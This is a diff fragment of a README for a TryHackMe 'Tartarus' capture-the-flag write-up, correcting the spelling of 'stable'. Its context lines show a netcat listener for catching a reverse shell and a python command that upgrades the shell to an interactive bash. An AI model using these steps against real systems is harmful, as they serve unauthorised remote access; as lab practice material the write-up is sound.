FrancescoGrazioso/TryHackMe_Tartarus/README.md

 nc -lnvp {the port in the rev shell file}
 ```

-and then make the shell stabile
+and then make the shell stable

 ```
 python -c 'import pty; pty.spawn("/bin/bash")'